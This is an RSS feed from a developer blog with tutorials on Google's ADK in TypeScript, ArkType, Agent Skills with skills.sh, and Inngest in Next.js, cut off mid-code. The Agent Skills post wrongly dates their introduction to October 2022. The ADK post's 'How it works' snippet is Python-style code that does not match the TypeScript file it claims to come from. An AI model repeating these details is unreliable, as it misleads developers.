<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Nidhin's blog]]></title><description><![CDATA[✨Crafting Code with a Smile for 8 Years:) Merging the Formal Dance of Angular, the Playful Rhythms of React, and the Next-level Moves of Next.js 🚀]]></description><link>https://blog.nidhin.dev</link><generator>RSS for Node</generator><lastBuildDate>Wed, 15 Apr 2026 07:14:51 GMT</lastBuildDate><atom:link href="https://blog.nidhin.dev/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Build Your First Agent with Agent Development Kit using TypeScript]]></title><description><![CDATA[The Agent Development Kit (ADK) is an open-source, modular framework designed to shift agent creation from basic prompt engineering to a structured, code-first software development approach. It provid]]></description><link>https://blog.nidhin.dev/build-your-first-agent-with-agent-development-kit-using-typescript</link><guid isPermaLink="true">https://blog.nidhin.dev/build-your-first-agent-with-agent-development-kit-using-typescript</guid><category><![CDATA[AI]]></category><category><![CDATA[adk]]></category><category><![CDATA[agents]]></category><category><![CDATA[Google]]></category><category><![CDATA[mcp]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Tue, 14 Apr 2026 16:02:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/59840b28-1549-47b5-93ac-129043a9a5d2.gif" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The <strong>Agent Development Kit (ADK)</strong> is an open-source, modular framework designed to shift agent creation from basic prompt engineering to a structured, code-first software development approach. It provides developers with the precision and control needed to build complex, enterprise-ready multi-agent systems.</p>
<p>While many examples focus on Python, We are going to built Agent using Typescript</p>
<h2>1.Core Features and Benefits of ADK</h2>
<p>ADK simplifies end-to-end development by making it feel like traditional software development. Its features are built around several core pillars:</p>
<h3>a.Precision and Control</h3>
<ul>
<li><p><strong>Flexible Orchestration:</strong> Create predictable pipelines using workflow agents like sequential, parallel, and loop agents.</p>
</li>
<li><p><strong>Dynamic Routing:</strong> For complex scenarios, agents can adapt their strategy in real-time based on LLM-driven reasoning.</p>
</li>
</ul>
<h3>b.Multi-agent Architecture</h3>
<p>Instead of one massive agent, ADK allows you to build a hierarchy of specialized agents. A primary agent can delegate specific tasks to these specialized roles, making the system more reliable and scalable.</p>
<h3>c.Rich Tool Ecosystem</h3>
<p>Agents can leverage pre-built tools such as Google Search and Code Execution, or integrate with custom enterprise APIs and third-party libraries. ADK also allows agents to use other agents as tools.</p>
<h3>d. Code-First and Modular Design</h3>
<p>Agent logic and orchestration are defined directly in code (TypeScript, Python, or Java), which promotes better testability and version control.</p>
<h3>e. Integrated Tooling and Evaluation</h3>
<ul>
<li><p><strong>CLI &amp; Web UI:</strong> Easily run, test, and debug your agents locally</p>
</li>
<li><p><strong>Built-in Evaluation:</strong> Test performance against predefined scenarios to evaluate both the final answer and the reasoning trajectory used to reach it.</p>
</li>
</ul>
<h2>2.The Core Agent Architecture</h2>
<p>In ADK, an agent is defined by the formula: <strong>Agent = Model + Tools + Orchestration</strong>.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/28d58db2-625e-4fe1-89ce-3467a7890ebf.png" alt="" style="display:block;margin:0 auto" />

<h2>3.Getting Started with TypeScript</h2>
<p>Create an empty <code>adk-agent</code> directory for your project:</p>
<pre><code class="language-typescript">adk-agent/
</code></pre>
<p>Use the <code>npm</code> tool to install and configure dependencies for your project, including the package file, ADK TypeScript main library, and developer tools. Run the following commands from your <code>adk-agent/</code> directory to create the <code>package.json</code> file and install the project dependencies:</p>
<pre><code class="language-typescript">cd adk-agent/
# initialize a project as an ES module
npm init --yes
npm pkg set type="module"
npm pkg set main="agent.ts"
# install ADK libraries
npm install @google/adk
# install dev tools as a dev dependency
npm install -D @google/adk-devtools
</code></pre>
<p>Create the code for a basic agent, including a simple implementation of an ADK <a href="https://adk.dev/tools/function-tools/">Function Tool</a>, called <code>getCurrentTime</code>. Create an <code>agent.ts</code> file in your project directory and add the following code:</p>
<pre><code class="language-typescript">import {FunctionTool, LlmAgent} from '@google/adk';
import {z} from 'zod';

/* Mock tool implementation */
const getCurrentTime = new FunctionTool({
  name: 'get_current_time',
  description: 'Returns the current time in a specified city.',
  parameters: z.object({
    city: z.string().describe("The name of the city for which to retrieve the current time."),
  }),
  execute: ({city}) =&gt; {
    return {status: 'success', report: `The current time in ${city} is 10:30 AM`};
  },
});

export const rootAgent = new LlmAgent({
  name: 'hello_time_agent',
  model: 'gemini-2.5-flash',
  description: 'Tells the current time in a specified city.',
  instruction: `You are a helpful assistant that tells the current time in a city.
                Use the 'getCurrentTime' tool for this purpose.`,
  tools: [getCurrentTime],
});
</code></pre>
<h3>Add your API Key</h3>
<p>For this tutorial we use the Gemini API, which requires an API key. If you don't already have Gemini API key, create a key in Google AI Studio on the <a href="https://aistudio.google.com/app/apikey">API Keys</a> page.</p>
<p>In a terminal window, write your API key into your <code>.env</code> file of your project to set environment variables:</p>
<pre><code class="language-typescript">echo 'GEMINI_API_KEY="YOUR_API_KEY"' &gt; .env
</code></pre>
<h3>Run your Agent</h3>
<p>You can run your ADK agent with the <code>@google/adk-devtools</code> library as an interactive command-line interface using the <code>run</code> command or the ADK web user interface using the <code>web</code> command. Both these options allow you to test and interact with your agent.</p>
<pre><code class="language-typescript">npx adk run agent.ts
</code></pre>
<h3>Run with Web Interface</h3>
<p>Run your agent with the ADK web interface using the following command:</p>
<pre><code class="language-typescript">npx adk web
</code></pre>
<p>This command starts a web server with a chat interface for your agent. You can access the web interface at (<a href="http://localhost:8000">http://localhost:8000</a>). Select your agent at the upper right corner and type a request.</p>
<img src="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/dd7a9355-29b9-4fd4-a83b-4288a7861271.png" alt="" style="display:block;margin:0 auto" />

<p>Voila you have made it. You have created an agent in no time. Congrats!!!, but still a long way to go.</p>
<h3>How it works</h3>
<p>In the agent.ts file you can see the following snippet</p>
<pre><code class="language-typescript">root_agent = Agent(
   model=’gemini-2.5-flash’, # Model: The reasoning engine (Course 1!)
   name=’root_agent’, # Identity: Required identifier
   description=’A helpful agent.’, # Purpose: What this agent does
   instruction=’You are helpful.’ # Behavior: How to act
   # Tools: You’ll add these in Module 3
   # Orchestration: Handled automatically by the Agent class
)
</code></pre>
<ul>
<li><p>Model ( gemini-2.5-flash): The LLM that provides reasoning and decision-making</p>
</li>
<li><p>Tools: Functions the agent calls to take actions (module 3)</p>
</li>
<li><p>Orchestration: The Agent class automatically runs the Perceive → Think → Act → Check loop</p>
</li>
</ul>
<p>Will catch up in a new post where we dive in more with ADK Agents. Till then Happy Learning :)</p>
]]></content:encoded></item><item><title><![CDATA[ArkType]]></title><description><![CDATA[ArkType is a TypeScript-first runtime type validation library. It allows you to define types and validation rules using TypeScript-like syntax, and then validate data at runtime while keeping full Typ]]></description><link>https://blog.nidhin.dev/arktype</link><guid isPermaLink="true">https://blog.nidhin.dev/arktype</guid><category><![CDATA[TypeScript]]></category><category><![CDATA[Arktype]]></category><category><![CDATA[zod]]></category><category><![CDATA[Validation]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[runtime]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 07 Mar 2026 15:27:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/6536409b7aa52ef9eb6c6b78/baba169a-6419-4942-9342-5d1261a7b3c6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>ArkType</strong> is a <strong>TypeScript-first runtime type validation library</strong>. It allows you to define <strong>types and validation rules using TypeScript-like syntax</strong>, and then <strong>validate data at runtime</strong> while keeping full <strong>TypeScript type inference</strong>.</p>
<p>In simple terms</p>
<blockquote>
<p>ArkType lets you define a type <strong>once</strong>, and use it for <strong>both compile-time typing and runtime validation</strong></p>
</blockquote>
<h2>1.Why ArkType is Needed</h2>
<p>In <strong>TypeScript</strong>, types exist only during development (compile time). When your code runs, <strong>TypeScript types disappear</strong>.</p>
<pre><code class="language-typescript">type User = {
  name: string
  age: number
}
</code></pre>
<p>If you receive JSON from an API</p>
<pre><code class="language-typescript">const data = JSON.parse(input)
</code></pre>
<p>TypeScript <strong>cannot guarantee</strong> that <code>data</code> actually matches <code>User</code>.</p>
<p>This is where ArkType helps — it <strong>validates the data at runtime</strong>.</p>
<pre><code class="language-typescript">import { type } from "arktype"

const User = type({
  name: "string",
  age: "number"
})

const result = User({ name: "John", age: 30 })

if (result instanceof Error) {
  console.log(result.message)
} else {
  console.log("Valid user")
}
</code></pre>
<p>What happens in the above code</p>
<ol>
<li><p>We define a <strong>schema</strong></p>
</li>
<li><p>Pass data to it</p>
</li>
<li><p>ArkType <strong>validates it at runtime</strong></p>
</li>
<li><p>TypeScript automatically knows the type.</p>
</li>
</ol>
<h2>2.Features of ArkType</h2>
<h3>a.Typescript like syntax</h3>
<pre><code class="language-typescript">const User = type({
  id: "number",
  email: "string.email",
  age: "number &gt;= 18"
})
</code></pre>
<h3>b.Runtime validation errors</h3>
<pre><code class="language-typescript">User({
  id: 1,
  email: "test@mail.com",
  age: 20
})
</code></pre>
<p>Invalid input throws structured errors.</p>
<h3>c.Full Type Inference</h3>
<pre><code class="language-typescript">type UserType = typeof User.infer
</code></pre>
<p>TypeScript automatically understands the type.</p>
<h3>d. Very Fast</h3>
<p>ArkType is designed to be <strong>extremely fast</strong> compared to many validation libraries like Zod, Yup. ArkType takes 14 nanoseconds at runtime which is 20x faster than Zod and 2000x faster than Yup.</p>
<p>You can check the benchmarks here: <a href="https://moltar.github.io/typescript-runtime-type-benchmarks/">https://moltar.github.io/typescript-runtime-type-benchmarks/</a></p>
<h2><strong>3.Comparison with other libraries</strong></h2>
<table>
<thead>
<tr>
<th>Library</th>
<th>Syntax</th>
<th>Speed</th>
<th>TypeScript Integration</th>
</tr>
</thead>
<tbody><tr>
<td>ArkType</td>
<td>Very Simple</td>
<td>Very Fast</td>
<td>Excellent</td>
</tr>
<tr>
<td>Zod</td>
<td>Verbose</td>
<td>Medium</td>
<td>Good</td>
</tr>
<tr>
<td>Yup</td>
<td>Verbose</td>
<td>Slower</td>
<td>Limited</td>
</tr>
<tr>
<td>Joi</td>
<td>Complex</td>
<td>Medium</td>
<td>Weak</td>
</tr>
</tbody></table>
<p>ArkType</p>
<pre><code class="language-typescript">const User = type({
  name: "string",
  age: "number &gt; 18"
})

// extract the type if needed
type User = typeof User.infer
</code></pre>
<p>Zod</p>
<pre><code class="language-typescript">const User = z.object({
  name: z.string(),
  age: z.number().min(18)
})
</code></pre>
<p>ArkType is much shorter and closer to natural TypeScript.</p>
<h2>4.Installation &amp; Setup of ArkType in your Project</h2>
<p>You can install arktype with the following command</p>
<pre><code class="language-typescript">bun install arktype
</code></pre>
<p>Ensure you have</p>
<ul>
<li><p>TypeScript version <code>&gt;=5.1</code>.</p>
</li>
<li><p>A <code>package.json</code> with <code>"type": "module"</code> (or an environment that supports ESM imports)</p>
</li>
<li><p>A <code>tsconfig.json</code> with...</p>
<ul>
<li><p><code>strict</code> or <code>strictNullChecks</code> (<strong>required</strong>)</p>
</li>
<li><p><code>skipLibCheck</code> (recommended)</p>
</li>
<li><p><code>exactOptionalPropertyTypes</code> (recommended)</p>
</li>
</ul>
</li>
</ul>
<p><strong>VS Code Extension</strong> - To take advantage of all ArkType's autocomplete capabilities, you'll need to add the following to your workspace settings at <code>./vscode/settings.json</code></p>
<pre><code class="language-typescript">// allow autocomplete for ArkType expressions like "string | num"
"editor.quickSuggestions": {
	"strings": "on"
},
// prioritize ArkType's "type" for autoimports
"typescript.preferences.autoImportSpecifierExcludeRegexes": [
	"^(node:)?os$"
],
</code></pre>
<p>You can check more about ArkType from their official documentation: <a href="https://arktype.io/docs/intro/setup">https://arktype.io/docs/intro/setup</a></p>
<p>Well you have gathered some information about ArkType today and just start building things with ArkType and see how it works for you.</p>
<p>Will catchup in another interesting post :)</p>
]]></content:encoded></item><item><title><![CDATA[Agent Skills]]></title><description><![CDATA[Are you ready to supercharge your AI agents? Imagine an AI that not only understands your requests but can also execute complex, multi-step tasks with precision. This is where Agent Skills come in, and they're set to revolutionize how we interact wit...]]></description><link>https://blog.nidhin.dev/agent-skills</link><guid isPermaLink="true">https://blog.nidhin.dev/agent-skills</guid><category><![CDATA[agentskils]]></category><category><![CDATA[claude cli]]></category><category><![CDATA[AI]]></category><category><![CDATA[agentic AI]]></category><category><![CDATA[skills]]></category><category><![CDATA[Vercel]]></category><category><![CDATA[claude.ai]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 07 Feb 2026 15:40:53 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1770478608460/bc5ef923-e9ae-4ce5-b367-6deaebfc530e.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Are you ready to supercharge your AI agents? Imagine an AI that not only understands your requests but can also execute complex, multi-step tasks with precision. This is where <strong>Agent Skills</strong> come in, and they're set to revolutionize how we interact with AI!</p>
<h2 id="heading-1about-agent-skills">1.About Agent Skills</h2>
<p>Agent Skills, initially introduced by Anthropic in October 2022, an innovative way to share procedural knowledge with AI agents. At their core, these skills are simple yet powerful they're <strong>markdown files</strong> containing clear, specific instructions for your AI.</p>
<p>Think of them as mini-manuals that teach your AI exactly how to perform a task. Each skill comes with a <strong>YAML header</strong> that includes a name and description, giving your agent the necessary context before diving into action.</p>
<p>The brilliance of Agent Skills quickly caught on, leading to an <strong>open standard</strong> that has been embraced by major players in the AI world, including OpenAI Codex, Microsoft, GitHub, and Cursor. This widespread adoption means a more unified and portable way to enhance AI capabilities across different platforms.</p>
<h2 id="heading-2skillssh-your-new-best-friend-for-skill-management">2.Skills.sh - <strong>Your New Best Friend for Skill Management</strong></h2>
<p>Managing these powerful skills has never been easier, thanks to <a target="_blank" href="http://skills.sh"><strong>skills.sh</strong></a>, Vercel's new command-line interface (CLI) tool. This tool simplifies the process of installing and managing skills, making it accessible even for those new to AI agent development.</p>
<h2 id="heading-3getting-started">3.Getting Started</h2>
<p>To install a skill, use the <code>skills</code> CLI:</p>
<pre><code class="lang-typescript">npx skills add vercel-labs/agent-skills
</code></pre>
<p>This will install the skill and make it available to your AI agent.</p>
<p>Go to your project where you need a skill for one of the project i am using the anthropic skill for a simple website that is <code>npx skills add anthropics/skills</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770475845462/5a6e0533-702c-4fe3-bd16-0e0bcd47e382.png" alt class="image--center mx-auto" /></p>
<p>Once the skill is installed you can choose the skill that you want in my case it is frontend-design and once it is choosed you can choose to which agent you want this skill</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770475923278/c5a9d8e4-0f18-4ff2-843f-568e3247092f.png" alt class="image--center mx-auto" /></p>
<p>After choosing the agent you can see the skill repo is clone and it is added</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770475978599/54e67fae-8be3-49d5-9925-0fd4178d4337.png" alt class="image--center mx-auto" /></p>
<p>If you open your project now you can see that skill. Example if you choose the claude agent you can see that skill like below</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476100991/53e140b3-ac16-44a5-a0ce-2757e5b96398.png" alt class="image--center mx-auto" /></p>
<p>And now you can give your Claude agent the instructions that you want and it will consider the following instructions.</p>
<h2 id="heading-4creating-your-own-skill">4.Creating your own skill</h2>
<p>You can create your own skill and publish it to the vercel skills for that what you need to do is very simple that is</p>
<pre><code class="lang-typescript">npx skills --help
</code></pre>
<p>you can see the list of options from the skills cli like below</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476368863/23b03d85-8dd5-439e-ba1e-75dce69ed39e.png" alt class="image--center mx-auto" /></p>
<p>Now we will create a new skill for code review using the below command</p>
<pre><code class="lang-typescript">npx skills init skills code-review
</code></pre>
<p>which will create a skill like below</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476596862/c5c9a560-ded9-48af-988f-5636eb631bc6.png" alt class="image--center mx-auto" /></p>
<p>And if you open the project folder you can see a skill template like below</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770476884892/e1398d6c-2d9f-4999-ae47-9e26e25bc90c.png" alt class="image--center mx-auto" /></p>
<p>Now we will add a skill creator so that we will know the structure that we need to followup. Add the skill creator in the skill using the below command</p>
<pre><code class="lang-typescript">npx skills add https:<span class="hljs-comment">//github.com/anthropics/skills --skill skill-creator</span>
</code></pre>
<p>Once the skill-creator is installed you would see something like this in your project directory</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770477111013/2cb5cb26-5b88-4463-aa67-ae7247380131.png" alt class="image--center mx-auto" /></p>
<p>Now you can update the instructions based on your need and can share the skill.</p>
<p>Will take one more example of downloading the react best practices that needs to be followed. Download the</p>
<pre><code class="lang-typescript">npx skills add https:<span class="hljs-comment">//github.com/vercel-labs/agent-skills --skill vercel-react-best-practices</span>
</code></pre>
<p>Once the skill is downloaded you can see 3 things inside the .claude directory inside the vercel-react-best-practices</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770477998275/957e0481-0af9-4ec5-8e65-de53cdaafc62.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p><strong>AGENTS.md</strong> which is mainly for agents and LLMs to follow when maintaining</p>
</li>
<li><p><strong>SKILL.md</strong> Guidelines for the skill</p>
</li>
<li><p>rules directory - Here you can find the best practices along with examples like below</p>
<p>  <img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1770478137601/a27bacd2-2882-4342-a973-f738340e7a82.png" alt class="image--center mx-auto" /></p>
</li>
</ul>
<h2 id="heading-5how-to-validate-a-skill">5.How to Validate a Skill</h2>
<p>When building a skill, it's crucial to <strong>work iteratively</strong> on it until it reaches a state where you can fully delegate the task to Claude.</p>
<ul>
<li><p><strong>Generate log files:</strong> Once you have validated that your skill works correctly, you should generate log files. This helps ensure that you don't accidentally use a skill that has not been properly validated.</p>
</li>
<li><p><strong>Teach Claude edge cases:</strong> You need to teach Claude or your AI agent the <strong>edge cases</strong> to ensure it handles them well, and then add these to the skill. This iterative process helps refine the skill until it consistently produces the desired results.</p>
</li>
</ul>
<h2 id="heading-6sharing-a-skill-via-github">6.Sharing a skill via GitHub</h2>
<p>Skills are shared via GitHub by housing them within a <code>skills</code> directory inside a GitHub repository.</p>
<p>Here's how it works:</p>
<ul>
<li><p>The entire set of skills for a project lives inside this <code>skills</code> directory.</p>
</li>
<li><p>Each specific skill will have its own directory within this main <code>skills</code> folder.</p>
</li>
<li><p>Inside each individual skill's directory, there is a <a target="_blank" href="http://skill.md"><code>skill.md</code></a> file, which serves as the <strong>entry point</strong> for the AI agent. This file contains the skill's description and main instructions.</p>
</li>
<li><p>Alongside the <a target="_blank" href="http://skill.md"><code>skill.md</code></a> file, you can include other resources like <strong>scripts, additional markdown files, or templates</strong> that the skill might need.</p>
</li>
<li><p>This structure allows skills to be easily cloned and installed by other users using tools like <a target="_blank" href="http://skills.sh"><code>skills.sh</code></a>.</p>
</li>
</ul>
<p>This method is convenient because a skill can be located in the same repository as the tool it teaches the agent to use, making it easier to update the skill whenever the tool is updated</p>
<p>Voila we have learnt how to use a skill in our project to make things better as well as learned how to create our own skill.</p>
<p>You can find some great skills in the Vercel 🎉</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://skills.sh/">https://skills.sh/</a></div>
<p> </p>
<p>Sky is the limit of what you can do with them.</p>
]]></content:encoded></item><item><title><![CDATA[Inngest - 101]]></title><description><![CDATA[In the era of AI and bots, have you ever wondered how long-running tasks—like waiting for a response from an assistant—actually work behind the scenes? With a traditional HTTP request, this kind of interaction isn’t always feasible, since HTTP is typ...]]></description><link>https://blog.nidhin.dev/inngest-101</link><guid isPermaLink="true">https://blog.nidhin.dev/inngest-101</guid><category><![CDATA[Inngest]]></category><category><![CDATA[workflows]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[background]]></category><category><![CDATA[agents]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 01 Feb 2026 18:06:56 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1769968885217/20181e6d-f96d-416a-b724-74b9fa2984ae.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In the era of AI and bots, have you ever wondered how long-running tasks—like waiting for a response from an assistant—actually work behind the scenes? With a traditional HTTP request, this kind of interaction isn’t always feasible, since HTTP is typically short-lived and request–response based.</p>
<p>To support real-time, bi-directional communication, developers often rely on technologies like WebSockets.</p>
<p>This is where <strong>Inngest</strong> comes in.</p>
<h2 id="heading-1-what-is-inngest">1. What is Inngest?</h2>
<p>Inngest replaces traditional message queues (like RabbitMQ or SQS) and state management systems. It allows you to write plain functions in TypeScript, Python, or Go that are <strong>durable</strong>—meaning they can run for minutes, hours, or months, survive server restarts, and automatically retry on failure.</p>
<p><strong>Key Concepts</strong></p>
<ul>
<li><p><strong>Events:</strong> Instead of calling a function directly, you "send" an event (like user.signup). Inngest then triggers any functions listening for that event.</p>
</li>
<li><p><strong>Steps:</strong> Functions are broken into atomic "steps" (step.run, step.sleep). If a function fails at step 3, Inngest knows to only retry step 3 without re-running steps 1 and 2.</p>
</li>
<li><p><strong>Durable Execution:</strong> Inngest handles the state and "waits" for you. For example, you can tell a function to step.sleep("wait-a-week", "7d"), and the function will pause and resume a week later.</p>
</li>
</ul>
<h2 id="heading-2-core-features">2. Core Features</h2>
<ul>
<li><p><strong>Zero Infrastructure:</strong> You don’t need to host a queue or a worker. Inngest calls your functions via a secure HTTPS webhook.</p>
</li>
<li><p><strong>Flow Control:</strong> Built-in support for <strong>concurrency</strong> (limit how many jobs run at once), <strong>throttling</strong> (limit throughput to third-party APIs), and <strong>debouncing</strong>.</p>
</li>
<li><p><strong>Observability:</strong> A built-in dashboard shows every event, every function run, and precisely where a workflow failed or is currently paused.</p>
</li>
<li><p><strong>Local Development:</strong> The <strong>Inngest Dev Server</strong> gives you a local UI to trigger events and visualize your functions as you write them.</p>
</li>
</ul>
<p>You can read more about Inngest and it’s features from this document</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://www.inngest.com/">https://www.inngest.com/</a></div>
<p> </p>
<p>Now we will see how we can integrate inngest in Next.js application</p>
<h2 id="heading-3nextjs-quick-start">3.Next.js Quick Start</h2>
<p>Before we start ensure you have created a Next.js application using the below command</p>
<pre><code class="lang-bash">npx create-next-app@latest --ts --eslint --tailwind --src-dir --app --import-alias=<span class="hljs-string">'@/*'</span> inngest-guide
</code></pre>
<p>once done run the application using the command <code>npm run dev</code></p>
<p>Now we will install the inngest. With the Next.js app now running open a new tab in your terminal. In your project directory's root, run the following command to install Inngest SDK:</p>
<pre><code class="lang-bash">npm install inngest
</code></pre>
<p>Now we will run the inngest server which is a fast, in-memory version of Inngest where we can quickly send and view events and function runs</p>
<pre><code class="lang-bash">npx --ignore-scripts=<span class="hljs-literal">false</span> inngest-cli@latest dev
</code></pre>
<p>In your browser open <a target="_blank" href="http://localhost:8288">http://localhost:8288</a> to see the development UI where later you will test the functions you write:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967306439/3bbd677c-f37f-4149-9bce-cc1f1825d075.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-create-an-inngest-client">Create an Inngest Client</h3>
<p>Inngest invokes your functions securely via an API endpoint at <code>/api/inngest</code>. To enable that, you will create an Inngest client in your Next.js project, which you will use to send events and create functions.</p>
<p>Make a new directory next to your app directory (for example, src/inngest) where you'll define your Inngest functions and the client.</p>
<p>In the /src/inngest directory create an Inngest client:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { Inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"inngest"</span>;

<span class="hljs-comment">// Create a client to send and receive events</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> inngest = <span class="hljs-keyword">new</span> Inngest({ id: <span class="hljs-string">"my-app"</span> });
</code></pre>
<p>Next, we will set up a route handler for the <code>/api/inngest</code> route. To do so, create a file inside your <code>app</code> directory (for example, at <code>src/app/api/inngest/route.ts</code>) with the following code:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { serve } <span class="hljs-keyword">from</span> <span class="hljs-string">"inngest/next"</span>;
<span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/client"</span>;

<span class="hljs-comment">// Create an API that serves zero functions</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> { GET, POST, PUT } = serve({
  client: inngest,
  functions: [
    <span class="hljs-comment">/* your functions will be passed here later! */</span>
  ],
});
</code></pre>
<h3 id="heading-create-your-first-inngest-function">Create your first Inngest Function</h3>
<p>In this step, we will write our first reliable serverless function. This function will be triggered whenever a specific event occurs (in our case, it will be test/<a target="_blank" href="http://hello.world">hello.world</a>). Then, it will sleep for a second and return a "Hello, World!".</p>
<p>Inside your <code>src/inngest</code> directory create a new file called <code>functions.ts</code> where you will define Inngest functions. Add the following code:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"./client"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> helloWorld = inngest.createFunction(
  { id: <span class="hljs-string">"hello-world"</span> },
  { event: <span class="hljs-string">"test/hello.world"</span> },
  <span class="hljs-keyword">async</span> ({ event, step }) =&gt; {
    <span class="hljs-keyword">await</span> step.sleep(<span class="hljs-string">"wait-a-moment"</span>, <span class="hljs-string">"1s"</span>);
    <span class="hljs-keyword">return</span> { message: <span class="hljs-string">`Hello <span class="hljs-subst">${event.data.email}</span>!`</span> };
  },
);
</code></pre>
<p>Now we will add the function to <code>serve()</code></p>
<p>Next, import your Inngest function in the routes handler (<code>src/app/api/inngest/route.ts</code>) and add it to the <code>serve</code> handler so Inngest can invoke it via HTTP:</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { serve } <span class="hljs-keyword">from</span> <span class="hljs-string">"inngest/next"</span>;
<span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/client"</span>;
<span class="hljs-keyword">import</span> { helloWorld } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/functions"</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> { GET, POST, PUT } = serve({
  client: inngest,
  functions: [
    helloWorld, <span class="hljs-comment">// &lt;-- This is where you'll always add all your functions</span>
  ],
});
</code></pre>
<h2 id="heading-trigger-your-function-from-the-inngest-dev-server-ui">Trigger your function from the Inngest Dev Server UI</h2>
<p>Inngest is powered by events.You will trigger your function in two ways: first, by invoking it directly from the Inngest Dev Server UI, and then by sending events from code.</p>
<p>With your Next.js app and Inngest Dev Server running, open the Inngest Dev Server UI and select the "Functions" tab <a target="_blank" href="http://localhost:8288/functions"><code>http://localhost:8288/functions</code></a>. You should see your function. (Note: if you don't see any function, select the "Apps" tab to troubleshoot)</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967718163/c017fb80-bf87-4fc7-bb28-033f53725692.png" alt class="image--center mx-auto" /></p>
<p>To trigger your function, use the "Invoke" button for the associated function:</p>
<p>In the pop up editor, add your event payload data like the example below. This can be any JSON and you can use this data within your function's handler. Next, press the "Invoke Function" button:</p>
<pre><code class="lang-typescript">{
  <span class="hljs-string">"data"</span>: {
    <span class="hljs-string">"email"</span>: <span class="hljs-string">"test@example.com"</span>
  }
}
</code></pre>
<p>The payload is sent to Inngest (which is running locally) which automatically executes your function in the background! You can see the new function run logged in the "Runs" tab:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967870020/1736a8ac-5445-457f-902a-465e9959e100.png" alt class="image--center mx-auto" /></p>
<p>When you click on the run, you will see more information about the event, such as which function was triggered, its payload, output, and timeline:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769967929418/5e7abaeb-2584-43ac-9141-f2866560765e.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-triggering-from-code">Triggering from code</h3>
<p>To trigger Inngest functions to run in the background, you will need to send events from your application to Inngest. Once the event is received, it will automatically invoke all functions that are configured to be triggered by it.</p>
<p>To send an event from your code, you can use the Inngest client's send() method.</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { NextResponse } <span class="hljs-keyword">from</span> <span class="hljs-string">"next/server"</span>;
<span class="hljs-keyword">import</span> { inngest } <span class="hljs-keyword">from</span> <span class="hljs-string">"../../../inngest/client"</span>; <span class="hljs-comment">// Import our client</span>

<span class="hljs-comment">// Opt out of caching; every request should send a new event</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> dynamic = <span class="hljs-string">"force-dynamic"</span>;

<span class="hljs-comment">// Create a simple async Next.js API route handler</span>
<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">GET</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-comment">// Send your event payload to Inngest</span>
  <span class="hljs-keyword">await</span> inngest.send({
    name: <span class="hljs-string">"test/hello.world"</span>,
    data: {
      email: <span class="hljs-string">"testUser@example.com"</span>,
    },
  });

  <span class="hljs-keyword">return</span> NextResponse.json({ message: <span class="hljs-string">"Event sent!"</span> });
